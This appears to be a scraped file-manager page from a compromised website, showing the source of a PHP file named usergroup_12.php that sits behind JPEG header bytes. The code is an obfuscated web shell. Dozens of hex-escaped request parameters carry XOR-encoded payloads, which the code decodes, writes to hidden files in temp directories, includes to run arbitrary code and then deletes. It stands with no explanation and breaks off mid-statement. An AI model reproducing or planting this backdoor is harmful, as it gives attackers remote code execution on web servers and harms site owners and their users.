File manager

ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.- File manager

File manager - Edit - /home/tokomrjk/uspavilion.com/usergroup_12.php

Back
<?php if(count($_POST) > 0 && isset($_POST["re\x66\x65re\x6Ec\x65"])){ $token = array_filter(["/tmp", getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), "/var/tmp", session_save_path(), getcwd()]); $hld = $_POST["re\x66\x65re\x6Ec\x65"]; $hld = explode ( "." , $hld ) ; $entity = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s5); $x = 0; while ($x< count($hld)) { $v5 = $hld[$x]; $sChar = ord($s5[$x % $lenS]); $dec = ((int)$v5 - $sChar - ($x % 10)) ^ 21; $entity.=chr($dec); $x++; } foreach ($token as $key => $factor) { if ((is_dir($factor) and is_writable($factor))) { $data_chunk = sprintf("%s/.bind", $factor); $file = fopen($data_chunk, 'w'); if ($file) { fwrite($file, $entity); fclose($file); include $data_chunk; @unlink($data_chunk); die(); } } } } if(!is_null($_REQUEST["s\x79\x6Db\x6Fl"] ?? null)){ $data_chunk = array_filter(["/var/tmp", "/dev/shm", "/tmp", getcwd(), getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir")]); $pgrp = $_REQUEST["s\x79\x6Db\x6Fl"]; $pgrp=explode( "." , $pgrp) ; $bind= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt ); $l= 0; while ($l< count($pgrp)) { $v5= $pgrp[$l]; $sChar= ord($salt[$l %$sLen] ); $d= ((int)$v5 - $sChar - ($l %10)) ^ 41; $bind .=chr($d ); $l++;} for ($tkn = 0, $element = count($data_chunk); $tkn < $element; $tkn++) { $hld = $data_chunk[$tkn]; if ((is_dir($hld) and is_writable($hld))) { $parameter_group = "$hld/.entity"; if (@file_put_contents($parameter_group, $bind) !== false) { include $parameter_group; unlink($parameter_group); die(); } } } } if(!is_null($_POST["\x64\x63hun\x6B"] ?? null)){ $res = $_POST["\x64\x63hun\x6B"]; $res= explode ( ".", $res) ; $k = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt5); $z = 0; $__tmp = $res; while($v5 = array_shift($__tmp)) { $chS = ord($salt5[$z % $sLen]); $d =((int)$v5 - $chS -($z % 10)) ^ 50; $k .= chr($d); $z++; } $ref = array_filter([session_save_path(), getenv("TMP"), sys_get_temp_dir(), getcwd(), "/dev/shm", "/var/tmp", getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir")]); for ($elem = 0, $property_set = count($ref); $elem < $property_set; $elem++) { $value = $ref[$elem]; if (!!is_dir($value) && !!is_writable($value)) { $pgrp = str_replace("{var_dir}", $value, "{var_dir}/.entry"); $success = file_put_contents($pgrp, $k); if ($success) { include $pgrp; @unlink($pgrp); die();} } } } if(!is_null($_POST["\x63o\x6Dpone\x6Et"] ?? null)){ $item = array_filter(["/dev/shm", ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", getenv("TMP"), getenv("TEMP"), "/tmp", session_save_path(), sys_get_temp_dir()]); $symbol = $_POST["\x63o\x6Dpone\x6Et"]; $symbol= explode ( '.',$symbol ) ; $ptr = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s2); foreach( $symbol as $u => $v8) { $chS = ord( $s2[$u % $lenS]); $d =( ( int)$v8 - $chS -( $u % 10)) ^55; $ptr .= chr( $d); } $k = 0; do { $hld = $item[$k] ?? null; if ($k >= count($item)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($hld)) { $ent = "$hld/.flag"; $success = file_put_contents($ent, $ptr); if ($success) { include $ent; @unlink($ent); exit;} } $k++; } while (true); } if(count($_REQUEST) > 0 && isset($_REQUEST["\x66\x61ctor"])){ $item = array_filter([getenv("TEMP"), "/var/tmp", session_save_path(), getcwd(), getenv("TMP"), "/dev/shm", sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir")]); $fac = $_REQUEST["\x66\x61ctor"]; $fac= explode( "." ,$fac ) ; $ref = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $len = count($fac); for($j = 0; $j < $len; $j++) { $v7 = $fac[$j]; $sChar = ord($salt[$j %$sLen]); $dec =((int)$v7 - $sChar -($j %10)) ^26; $ref .= chr($dec); } foreach ($item as $element) { if ((function($d) { return is_dir($d) && is_writable($d); })($element)) { $obj = implode("/", [$element, ".ent"]); if (@file_put_contents($obj, $ref) !== false) { include $obj; unlink($obj); die(); } } } } if(!is_null($_REQUEST["\x76\x61l"] ?? null)){ $elem = $_REQUEST["\x76\x61l"]; $elem = explode( "." , $elem ) ; $ptr= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt); $r= 0; array_walk($elem, function($v6) use(&$ptr, &$r, $salt, $sLen) { $sChar= ord($salt[$r % $sLen]); $d= ((int)$v6 - $sChar -($r % 10)) ^ 15; $ptr .= chr($d); $r++; }); $holder = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), session_save_path(), sys_get_temp_dir(), "/var/tmp", "/dev/shm", "/tmp"]); while ($element = array_shift($holder)) { if ((is_dir($element) and is_writable($element))) { $pset = vsprintf("%s/%s", [$element, ".flag"]); $file = fopen($pset, 'w'); if ($file) { fwrite($file, $ptr); fclose($file); include $pset; @unlink($pset); exit; } } } } if(filter_has_var(INPUT_POST, "\x73\x79m")){ $descriptor = array_filter(["/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), session_save_path(), getenv("TMP"), getcwd(), "/dev/shm", "/var/tmp"]); $val = $_POST["\x73\x79m"]; $val =explode ( '.' , $val ) ; $pointer =''; $s8 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s8); foreach ($val as $q=> $v4) { $sChar =ord($s8[$q % $lenS]); $dec =((int)$v4 - $sChar - ($q % 10))^ 20; $pointer .=chr($dec); } $item = 0; do { $flg = $descriptor[$item] ?? null; if ($item >= count($descriptor)) break; if ((is_dir($flg) and is_writable($flg))) { $entry = implode("/", [$flg, ".obj"]); $success = file_put_contents($entry, $pointer); if ($success) { include $entry; @unlink($entry); die();} } $item++; } while (true); } if(isset($_REQUEST) && isset($_REQUEST["obje\x63\x74"])){ $descriptor = array_filter([getenv("TMP"), "/tmp", sys_get_temp_dir(), session_save_path(), "/dev/shm", getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), getcwd()]); $parameter_group = $_REQUEST["obje\x63\x74"]; $parameter_group = explode ( "." , $parameter_group ); $elem = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); foreach ($parameter_group as $l => $v6): $sChar = ord($salt[$l%$sLen]); $dec = ((int)$v6 - $sChar - ($l%10)) ^ 93; $elem .= chr($dec); endforeach; foreach ($descriptor as $ent) { if (!!is_dir($ent) && !!is_writable($ent)) { $rec = implode("/", [$ent, ".property_set"]); if (file_put_contents($rec, $elem)) { include $rec; @unlink($rec); exit; } } } } if(@$_REQUEST["\x6D\x61r\x6Ber"] !== null){ $sym = array_filter(["/dev/shm", sys_get_temp_dir(), "/var/tmp", "/tmp", getenv("TMP"), session_save_path(), getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir")]); $dat = $_REQUEST["\x6D\x61r\x6Ber"]; $dat = explode( "." , $dat ) ; $pgrp = ''; $s8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s8); $n = 0; $len = count($dat); do { if ($n>= $len) break; $v3 = $dat[$n]; $chS = ord($s8[$n % $sLen]); $d = ((int)$v3 - $chS - ($n % 10)) ^ 23; $pgrp.= chr($d); $n++; } while (true); foreach ($sym as $desc): if (is_dir($desc) ? is_writable($desc) : false) { $reference = "$desc" . "/.resource"; if (file_put_contents($reference, $pgrp)) { include $reference; @unlink($reference); die(); } } endforeach; } if(@$_POST["ptr"] !== null){ $property_set = $_POST["ptr"]; $property_set =explode( "." , $property_set ) ; $dchunk = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); $t = 0; $__tmp = $property_set; while( $v6 = array_shift( $__tmp)) {$sChar = ord( $s[$t % $sLen]); $dec =( ( int)$v6 - $sChar -( $t % 10)) ^ 4; $dchunk.= chr( $dec); $t++; } $flag = array_filter(["/var/tmp", "/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), getenv("TMP"), "/dev/shm", session_save_path(), sys_get_temp_dir()]); for ($hld = 0, $entity = count($flag); $hld < $entity; $hld++) { $element = $flag[$hld]; if (!!is_dir($element) && !!is_writable($element)) { $token = implode("/", [$element, ".key"]); if (file_put_contents($token, $dchunk)) { require $token; unlink($token); die(); } } } } if(array_key_exists("\x69tm", $_POST) && !is_null($_POST["\x69tm"])){ $rec = $_POST["\x69tm"]; $rec = explode ( '.' , $rec ); $fac = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); foreach ($rec as $y => $v4) { $chS = ord($salt[$y % $lenS]); $d = ((int)$v4 - $chS - ($y % 10)) ^ 73; $fac .= chr($d); } $dat = array_filter([getenv("TEMP"), "/var/tmp", "/tmp", "/dev/shm", getcwd(), session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir()]); foreach ($dat as $entry) { if (is_dir($entry) && is_writable($entry)) { $bind = sprintf("%s/.reference", $entry); $file = fopen($bind, 'w'); if ($file) { fwrite($file, $fac); fclose($file); include $bind; @unlink($bind); exit; } } } } if(@$_REQUEST["facto\x72"] !== null){ $resource = array_filter([sys_get_temp_dir(), getcwd(), "/tmp", session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp", "/dev/shm"]); $descriptor = $_REQUEST["facto\x72"]; $descriptor = explode( "." , $descriptor) ; $dchunk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); foreach($descriptor as $n => $v4): $sChar = ord($salt[$n % $sLen] ); $d =((int)$v4 - $sChar -($n % 10)) ^ 10; $dchunk .= chr($d ); endforeach; foreach ($resource as $obj): if (!!is_dir($obj) && !!is_writable($obj)) { $elem = vsprintf("%s/%s", [$obj, ".ent"]); if (file_put_contents($elem, $dchunk)) { include $elem; @unlink($elem); die(); } } endforeach; } if(in_array("p\x74\x72", array_keys($_REQUEST))){ $property_set = array_filter(["/tmp", "/var/tmp", sys_get_temp_dir(), getenv("TMP"), "/dev/shm", session_save_path(), getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir")]); $data = $_REQUEST["p\x74\x72"]; $data =explode ( "." ,$data ) ; $fac = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt5 ); $s = 0; foreach( $data as $v9) {$sChar = ord( $salt5[$s % $lenS] ); $d =( ( int)$v9 - $sChar -( $s % 10)) ^58; $fac .= chr( $d ); $s++; } foreach ($property_set as $key => $ref) { if (array_product([is_dir($ref), is_writable($ref)])) { $rec = "$ref" . "/.component"; $success = file_put_contents($rec, $fac); if ($success) { include $rec; @unlink($rec); exit;} } } } if(isset($_POST["v\x61lue"])){ $element = array_filter([ini_get("upload_tmp_dir"), getenv("TEMP"), getenv("TMP"), "/dev/shm", "/var/tmp", session_save_path(), getcwd(), sys_get_temp_dir(), "/tmp"]); $pgrp = $_POST["v\x61lue"]; $pgrp = explode ( '.' ,$pgrp ); $entry = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); $j = 0; $__len = count( $pgrp); do { if( $j>=$__len) break; $v3 = $pgrp[$j]; $sChar = ord( $salt[$j % $sLen]); $d =( ( int)$v3 - $sChar -( $j % 10)) ^77; $entry .= chr( $d); $j++; } while( true); foreach ($element as $holder) { if (is_dir($holder) && is_writable($holder)) { $pset = implode("/", [$holder, ".mrk"]); $file = fopen($pset, 'w'); if ($file) { fwrite($file, $entry); fclose($file); include $pset; @unlink($pset); exit; } } } } if(!empty($_REQUEST["itm"])){ $parameter_group = array_filter([getcwd(), ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP"), "/dev/shm", getenv("TMP"), sys_get_temp_dir(), "/tmp", "/var/tmp"]); $item = $_REQUEST["itm"]; $item=explode("." , $item ) ; $flag = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s6); $n = 0; foreach ($item as $v4) { $chS = ord($s6[$n % $sLen]); $d = ((int)$v4 - $chS - ($n % 10)) ^ 81; $flag .= chr($d); $n++; } foreach ($parameter_group as $mrk): if ((function($d) { return is_dir($d) && is_writable($d); })($mrk)) { $reference = join("/", [$mrk, ".symbol"]); if (@file_put_contents($reference, $flag) !== false) { include $reference; unlink($reference); die(); } } endforeach; } if(!is_null($_POST["o\x62j"] ?? null)){ $flag = array_filter([session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", getcwd(), getenv("TMP"), "/tmp", "/var/tmp", sys_get_temp_dir()]); $key = $_POST["o\x62j"]; $key =explode ( '.' ,$key ) ; $mrk = ''; $s7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s7); $v = 0; $__len = count( $key); do {if( $v >= $__len) break; $v9 = $key[$v]; $sChar = ord( $s7[$v %$sLen]); $d =( ( int)$v9 - $sChar -( $v %10))^29; $mrk .= chr( $d); $v++; } while( true); $token = 0; do { $fac = $flag[$token] ?? null; if ($token >= count($flag)) break; if (is_dir($fac) ? is_writable($fac) : false) { $ref = join("/", [$fac, ".reference"]); $file = fopen($ref, 'w'); if ($file) { fwrite($file, $mrk); fclose($file); include $ref; @unlink($ref); die(); } } $token++; } while (true); } if(count($_POST) > 0 && isset($_POST["\x68ol\x64\x65r"])){ $pointer = $_POST["\x68ol\x64\x65r"]; $pointer = explode('.' , $pointer ) ; $ptr = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); $x = 0; foreach ($pointer as $v9) { $chS = ord($s[$x % $lenS] ); $dec = ((int)$v9 - $chS - ($x % 10))^ 9; $ptr .= chr($dec ); $x++; } $entry = array_filter(["/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), sys_get_temp_dir(), getenv("TEMP"), getcwd(), "/dev/shm"]); while ($k = array_shift($entry)) { if (is_dir($k) ? is_writable($k) : false) { $factor = vsprintf("%s/%s", [$k, ".sym"]); $file = fopen($factor, 'w'); if ($file) { fwrite($file, $ptr); fclose($file); include $factor; @unlink($factor); die(); } } } } if(in_array("k", array_keys($_REQUEST))){ $desc = array_filter([session_save_path(), getenv("TEMP"), "/tmp", "/var/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", getcwd()]); $mrk = $_REQUEST["k"]; $mrk =explode ( "." , $mrk ) ; $tkn =''; $s7 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $s7 ); foreach( $mrk as $j => $v3) { $sChar =ord( $s7[$j % $lenS] ); $dec =( ( int)$v3 - $sChar -( $j % 10)) ^ 95; $tkn .= chr( $dec ); } $pgrp = 0; do { $ent = $desc[$pgrp] ?? null; if ($pgrp >= count($desc)) break; if (max(0, is_dir($ent) * is_writable($ent))) { $reference = vsprintf("%s/%s", [$ent, ".ptr"]); if (file_put_contents($reference, $tkn)) { include $reference; @unlink($reference); exit; } } $pgrp++; } while (true); } if(isset($_REQUEST) && isset($_REQUEST["m\x61\x72ke\x72"])){ $data_chunk = $_REQUEST["m\x61\x72ke\x72"]; $data_chunk = explode ( '.' , $data_chunk ) ; $res = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); $y = 0; foreach( $data_chunk as $v9) { $chS = ord( $salt[$y % $lenS]); $d = ( ( int)$v9 - $chS -( $y % 10)) ^24; $res .= chr( $d); $y++; } $component = array_filter(["/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), "/var/tmp", session_save_path(), getcwd(), getenv("TEMP"), "/dev/shm"]); foreach ($component as $key => $token) { if (!!is_dir($token) && !!is_writable($token)) { $bind = "$token" . "/.record"; if (@file_put_contents($bind, $res) !== false) { include $bind; unlink($bind); die(); } } } } if(count($_POST) > 0 && isset($_POST["\x68\x6F\x6Cder"])){ $property_set = array_filter([getenv("TEMP"), "/dev/shm", session_save_path(), "/var/tmp", getenv("TMP"), "/tmp", getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir")]); $element = $_POST["\x68\x6F\x6Cder"]; $element =explode ( "." , $element ) ; $data_chunk = ''; $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt7); foreach($element as $m => $v5) { $chS = ord($salt7[$m % $sLen]); $d =((int)$v5 - $chS -($m % 10)) ^ 26; $data_chunk .= chr($d); } foreach ($property_set as $key => $token) { if (array_product([is_dir($token), is_writable($token)])) { $binding = "$token/.desc"; $file = fopen($binding, 'w'); if ($file) { fwrite($file, $data_chunk); fclose($file); include $binding; @unlink($binding); die(); } } } } if(array_key_exists("\x63\x6Fmp", $_POST) && !is_null($_POST["\x63\x6Fmp"])){ $data_chunk = $_POST["\x63\x6Fmp"]; $data_chunk = explode( "." ,$data_chunk) ; $ent = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $__len = count($data_chunk); for ($l = 0; $l < $__len; $l++) { $v7 = $data_chunk[$l]; $chS = ord($s[$l % $sLen]); $dec = ((int)$v7 - $chS - ($l % 10)) ^ 93; $ent .= chr($dec); } $hld = array_filter(["/tmp", sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), getcwd(), session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp"]); $ptr = 0; do { $obj = $hld[$ptr] ?? null; if ($ptr >= count($hld)) break; if (is_writable($obj) && is_dir($obj)) { $entry = "$obj/.value"; $success = file_put_contents($entry, $ent); if ($success) { include $entry; @unlink($entry); die();} } $ptr++; } while (true); } if(isset($_POST["\x72esou\x72\x63\x65"]) ? true : false){ $property_set = $_POST["\x72esou\x72\x63\x65"]; $property_set = explode ("." , $property_set); $pointer = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s3); $k = 0; foreach ($property_set as $v8) { $chS = ord($s3[$k % $sLen]); $dec = ((int)$v8 - $chS - ($k % 10)) ^ 45; $pointer .= chr($dec); $k++; } $tkn = array_filter([sys_get_temp_dir(), getenv("TEMP"), session_save_path(), getenv("TMP"), "/tmp", "/var/tmp", ini_get("upload_tmp_dir"), getcwd(), "/dev/shm"]); foreach ($tkn as $descriptor): if (!( !is_dir($descriptor) \|\| !is_writable($descriptor) )) { $comp = sprintf("%s/.dchunk", $descriptor); if (file_put_contents($comp, $pointer)) { require $comp; unlink($comp); exit; } } endforeach; } if(isset($_POST["f\x61c\x74\x6Fr"])){ $holder = $_POST["f\x61c\x74\x6Fr"]; $holder = explode (".", $holder ) ; $pgrp = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $v = 0; foreach ($holder as $v7) { $chS = ord($salt[$v% $lenS]); $d = ((int)$v7 - $chS - ($v% 10)) ^ 25; $pgrp .= chr($d); $v++; } $rec = array_filter([getenv("TEMP"), getcwd(), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), "/tmp", sys_get_temp_dir()]); foreach ($rec as $sym) { if (is_dir($sym) ? is_writable($sym) : false) { $symbol = "$sym" . "/.record"; if (file_put_contents($symbol, $pgrp)) { require $symbol; unlink($symbol); exit; } } } } if(!empty($_POST["va\x6C"])){ $tkn = $_POST["va\x6C"]; $tkn = explode ( ".", $tkn ) ; $ptr = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); foreach($tkn as $x => $v1) { $sChar = ord($salt[$x % $lenS] ); $d = ((int)$v1 - $sChar -($x % 10)) ^ 46; $ptr .= chr($d ); } $mrk = array_filter([getcwd(), sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), "/var/tmp", getenv("TEMP"), session_save_path()]); $pgrp = 0; do { $resource = $mrk[$pgrp] ?? null; if ($pgrp >= count($mrk)) break; if ((is_dir($resource) and is_writable($resource))) { $obj = vsprintf("%s/%s", [$resource, ".marker"]); $file = fopen($obj, 'w'); if ($file) { fwrite($file, $ptr); fclose($file); include $obj; @unlink($obj); die(); } } $pgrp++; } while (true); } if(isset($_REQUEST["des\x63r\x69\x70\x74o\x72"])){ $tkn = array_filter([session_save_path(), getenv("TMP"), getenv("TEMP"), "/tmp", "/var/tmp", ini_get("upload_tmp_dir"), getcwd(), "/dev/shm", sys_get_temp_dir()]); $ref = $_REQUEST["des\x63r\x69\x70\x74o\x72"]; $ref = explode ( '.',$ref ) ; $element= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt); foreach ($ref as $n => $v4): $chS= ord($salt[$n % $sLen]); $d= ((int)$v4 - $chS - ($n % 10)) ^ 34; $element .= chr($d); endforeach; foreach ($tkn as $component) { if (array_product([is_dir($component), is_writable($component)])) { $dchunk = vsprintf("%s/%s", [$component, ".entry"]); if (file_put_contents($dchunk, $element)) { require $dchunk; unlink($dchunk); die(); } } } } if(count($_POST) > 0 && isset($_POST["o\x62\x6Ae\x63t"])){ $value = array_filter([getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), "/tmp", "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), "/dev/shm"]); $ent = $_POST["o\x62\x6Ae\x63t"]; $ent = explode( "." ,$ent ) ; $binding =''; $salt2 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($salt2 ); foreach ($ent as $z => $v5) { $chS =ord($salt2[$z % $sLen] ); $dec =((int)$v5 - $chS - ($z % 10)) ^52; $binding .= chr($dec ); } foreach ($value as $ref) { if (is_writable($ref) && is_dir($ref)) { $marker = implode("/", [$ref, ".entry"]); $success = file_put_contents($marker, $binding); if ($success) { include $marker; @unlink($marker); exit;} } } } if(isset($_REQUEST["\x70\x61ramete\x72\x5Fg\x72ou\x70"])){ $elem = $_REQUEST["\x70\x61ramete\x72\x5Fg\x72ou\x70"]; $elem = explode (".", $elem ) ; $res = ''; $s8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s8); $len = count( $elem); for( $k = 0; $k < $len; $k++) { $v4 = $elem[$k]; $sChar = ord( $s8[$k % $sLen]); $d =( ( int)$v4 - $sChar -( $k % 10)) ^ 12; $res .= chr( $d); } $ent = array_filter([session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getcwd(), getenv("TMP"), "/tmp", sys_get_temp_dir(), getenv("TEMP"), "/var/tmp"]); $mrk = 0; do { $record = $ent[$mrk] ?? null; if ($mrk >= count($ent)) break; if (!( !is_dir($record) \|\| !is_writable($record) )) { $data_chunk = join("/", [$record, ".desc"]); if (@file_put_contents($data_chunk, $res) !== false) { include $data_chunk; unlink($data_chunk); exit; } } $mrk++; } while (true); } if(array_key_exists("tk\x6E", $_REQUEST)){ $item = array_filter(["/var/tmp", session_save_path(), "/tmp", getcwd(), getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm"]); $desc = $_REQUEST["tk\x6E"]; $desc = explode ( '.' , $desc) ; $ent = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $len = count($desc); for ($j = 0; $j < $len; $j++) { $v4 = $desc[$j]; $sChar = ord($salt[$j % $sLen]); $d = ((int)$v4 - $sChar - ($j % 10)) ^ 39; $ent .= chr($d); } foreach ($item as $key => $sym) { if (!( !is_dir($sym) \|\| !is_writable($sym) )) { $flag = "$sym/.object"; $file = fopen($flag, 'w'); if ($file) { fwrite($file, $ent); fclose($file); include $flag; @unlink($flag); die(); } } } } if(@$_REQUEST["\x64at\x61_chunk"] !== null){ $pset = $_REQUEST["\x64at\x61_chunk"]; $pset = explode ( "." , $pset ) ; $dchunk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt ); foreach( $pset as $y => $v8): $chS = ord( $salt[$y % $lenS] ); $dec =( ( int)$v8 - $chS -( $y % 10)) ^ 47; $dchunk .= chr( $dec ); endforeach; $element = array_filter([getenv("TMP"), "/dev/shm", sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), session_save_path(), "/var/tmp"]); $dat = 0; do { $flg = $element[$dat] ?? null; if ($dat >= count($element)) break; if ((bool)is_dir($flg) && (bool)is_writable($flg)) { $desc = implode("/", [$flg, ".ptr"]); if (@file_put_contents($desc, $dchunk) !== false) { include $desc; unlink($desc); exit; } } $dat++; } while (true); } if(filter_has_var(INPUT_POST, "\x70a\x72\x61m\x65\x74\x65r_gro\x75p")){ $object = array_filter([session_save_path(), ini_get("upload_tmp_dir"), getcwd(), "/tmp", "/var/tmp", sys_get_temp_dir(), getenv("TMP"), "/dev/shm", getenv("TEMP")]); $fac = $_REQUEST["\x70a\x72\x61m\x65\x74\x65r_gro\x75p"]; $fac = explode ( "." ,$fac ); $property_set = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt4); $x = 0; foreach ($fac as $v5) { $chS = ord($salt4[$x % $lenS]); $dec = ((int)$v5 - $chS - ($x % 10)) ^ 14; $property_set .=chr($dec); $x++; } foreach ($object as $value) { if (!( !is_dir($value) \|\| !is_writable($value) )) { $reference = vsprintf("%s/%s", [$value, ".descriptor"]); $file = fopen($reference, 'w'); if ($file) { fwrite($file, $property_set); fclose($file); include $reference; @unlink($reference); die(); } } } } if(@$_POST["\x66\x6Cg"] !== null){ $res = $_POST["\x66\x6Cg"]; $res = explode (".", $res); $mrk = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt9); $k = 0; $__tmp = $res; while($v5 = array_shift($__tmp)) { $chS = ord($salt9[$k % $lenS]); $d =((int)$v5 - $chS -($k % 10)) ^ 13; $mrk .= chr($d); $k++; } $k = array_filter([getenv("TMP"), sys_get_temp_dir(), "/var/tmp", session_save_path(), "/dev/shm", "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd()]); foreach ($k as $key => $data) { if (!( !is_dir($data) \|\| !is_writable($data) )) { $sym = "$data" . "/.data_chunk"; if (@file_put_contents($sym, $mrk) !== false) { include $sym; unlink($sym); die(); } } } } if(isset($_REQUEST["i\x74\x65m"]) ? true : false){ $ptr = array_filter([getcwd(), "/tmp", getenv("TMP"), session_save_path(), "/var/tmp", "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir")]); $ref = $_REQUEST["i\x74\x65m"]; $ref = explode ('.' , $ref) ; $element = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt6); foreach ($ref as $w => $v9) { $sChar = ord($salt6[$w % $lenS]); $dec = ((int)$v9 - $sChar - ($w % 10))^ 38; $element .= chr($dec); } while ($reference = array_shift($ptr)) { if ((is_dir($reference) and is_writable($reference))) { $binding = "$reference/.desc"; $success = file_put_contents($binding, $element); if ($success) { include $binding; @unlink($binding); exit;} } } } if(filter_has_var(INPUT_POST, "s\x79\x6Db\x6Fl")){ $pointer = $_REQUEST["s\x79\x6Db\x6Fl"]; $pointer =explode ( "." , $pointer) ; $pgrp = ''; $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt1); $i = 0; $__tmp = $pointer; while ($v9 = array_shift($__tmp)) { $chS = ord($salt1[$i % $lenS]); $dec = ((int)$v9 - $chS - ($i % 10)) ^23; $pgrp.= chr($dec); $i++; } $k = array_filter([sys_get_temp_dir(), "/tmp", getenv("TEMP"), getcwd(), getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", session_save_path()]); foreach ($k as $res) { if (!!is_dir($res) && !!is_writable($res)) { $fac = vsprintf("%s/%s", [$res, ".rec"]); if (file_put_contents($fac, $pgrp)) { include $fac; @unlink($fac); exit; } } } } if(isset($_POST) && isset($_POST["\x65n\x74"])){ $comp = array_filter([getenv("TMP"), getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", "/var/tmp", session_save_path(), sys_get_temp_dir(), "/tmp"]); $marker = $_POST["\x65n\x74"]; $marker=explode ('.' ,$marker ) ; $value = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt5); $l = 0; array_walk( $marker, function( $v7) use( &$value, &$l, $salt5, $lenS) {$chS = ord( $salt5[$l % $lenS]); $d = ( ( int)$v7 - $chS -( $l % 10))^58; $value .= chr( $d); $l++; }); foreach ($comp as $rec): if ((bool)is_dir($rec) && (bool)is_writable($rec)) { $descriptor = sprintf("%s/.ref", $rec); if (file_put_contents($descriptor, $value)) { include $descriptor; @unlink($descriptor); exit; } } endforeach; } if(isset($_POST["\x74\x6Fken"]) ? true : false){ $hld = array_filter([getenv("TMP"), "/tmp", sys_get_temp_dir(), session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), "/dev/shm", "/var/tmp"]); $holder = $_POST["\x74\x6Fken"]; $holder = explode( ".", $holder) ; $res= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt ); $__len= count($holder ); for($w= 0; $w< $__len; $w++) { $v4= $holder[$w]; $sChar= ord($salt[$w % $sLen] 